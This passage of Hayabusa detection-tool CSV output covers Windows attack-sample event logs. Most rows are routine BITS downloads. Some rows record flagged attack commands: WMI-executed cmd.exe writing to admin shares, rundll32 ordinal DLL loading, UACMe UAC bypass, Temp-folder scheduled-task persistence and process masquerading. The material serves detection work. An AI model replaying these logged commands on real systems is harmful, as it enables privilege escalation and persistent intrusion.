Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe"" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca : Path: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-18 01:27:10.464 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\RuntimeBroker.exe -Embedding : Path: C:\Windows\System32\RuntimeBroker.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-18 07:37:52.809 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:52.892 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:52.956 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:52.991 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.047 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.111 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.169 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.230 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.417 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.527 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.571 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.664 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.771 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.807 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.867 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:37:53.928 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\Administrator : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.436 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe /Q /c cd 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\Administrator : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.676 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\Administrator : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-18 07:53:05.777 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smbmap_upload_exec_sysmon.evtx +2020-10-20 20:50:54.810 +09:00,DESKTOP-NTSSLJD,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059.001,technique_name=PowerShell : Command: ""C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe"" 64 : Path: C:\Users\den\Source\Repos\UACME\Source\Akagi\output\x64\Release\Akagi64.exe : User: DESKTOP-NTSSLJD\den : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:54.810 +09:00,DESKTOP-NTSSLJD,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:55.450 +09:00,DESKTOP-NTSSLJD,11,high,UAC Bypass Using IEInstal - File,,rules/sigma/file_event/sysmon_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading : Command: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe : Path: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe : User: DESKTOP-NTSSLJD\den : Parent Command: ""C:\Program Files\Internet Explorer\IEInstal.exe"" -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,UAC Bypass Using IEInstal - Process,,rules/sigma/process_creation/win_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.569 +09:00,DESKTOP-NTSSLJD,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059.003,technique_name=Windows Command Shell : Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: DESKTOP-NTSSLJD\den : Parent Command: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\wermgr.exe : Path: C:\Windows\System32\wermgr.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32.exe c:\temp\winfire.dll,DllRegisterServer",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx +2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,critical,Trickbot Malware Activity,,rules/sigma/process_creation/win_malware_trickbot_wermgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx +2020-10-21 07:33:02.064 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx +2020-10-21 07:35:26.755 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding : Path: C:\Windows\System32\wbem\WmiPrvSE.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx +2020-10-24 06:55:59.769 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{2015B2D1-1706-42F6-8C0E-8BEECB408D48}-86.0.4240.111_86.0.4240.75_chrome_updater.exe : URL: http://r2---sn-5hnekn7z.gvt1.com/edgedl/release2/chrome/E4_ltUMmNI-KvJYPRyaXng_86.0.4240.111/86.0.4240.111_86.0.4240.75_chrome_updater.exe?cms_redirect=yes&mh=3q&mip=213.127.65.23&mm=28&mn=sn-5hnekn7z&ms=nvh&mt=1603490058&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 06:57:29.217 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding : Path: C:\Windows\System32\wbem\WmiPrvSE.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948 : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: c:\Users\Public\test.tmp ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.399 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers : Path: C:\Windows\SysWOW64\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers : Path: C:\Windows\SysWOW64\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,high,Suspicius Add Task From User AppData Temp,,rules/sigma/process_creation/win_pc_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,1,high,Suspicious Call by Ordinal,,rules/sigma/process_creation/win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:21.695 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:22.066 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" DATAUS~1.DLL f8755 4624665222 rd : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 22:15:50.672 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 22:53:41.949 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amaWj.img?w=100&h=100&m=6&tilesize=medium&x=1912&y=840&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 22:53:43.173 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 23:25:16.281 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 23:25:17.595 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-25 00:07:57.551 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amczd.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-25 00:07:57.815 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-25 05:37:35.394 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amg5S.img?w=100&h=100&m=6&tilesize=medium&x=2238&y=680&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: "".\samir.exe"" : Path: C:\Users\bouss\Downloads\samir.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ProcessHerpaderping.exe ""c:\Program Files\Internet Explorer\iexplore.exe"" .\samir.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx +2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx +2020-11-02 03:28:53.729 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-02 03:30:10.144 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-02 03:30:10.448 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-02 03:30:10.667 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: SetupBinary : URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-02 03:30:11.059 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: SetupBinary : URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-02 03:33:01.610 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 19:55:56.114 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{DE1AA2CB-2733-420D-BD53-D15E1761ED0D}-86.0.4240.183_86.0.4240.111_chrome_updater.exe : URL: http://r2---sn-5hnekn7d.gvt1.com/edgedl/release2/chrome/APOVneiKVAxsNCc0oAg3ibQ_86.0.4240.183/86.0.4240.183_86.0.4240.111_chrome_updater.exe?cms_redirect=yes&mh=T1&mip=213.127.67.78&mm=28&mn=sn-5hnekn7d&ms=nvh&mt=1604573655&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 19:59:25.802 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 19:59:51.480 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 20:03:04.083 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 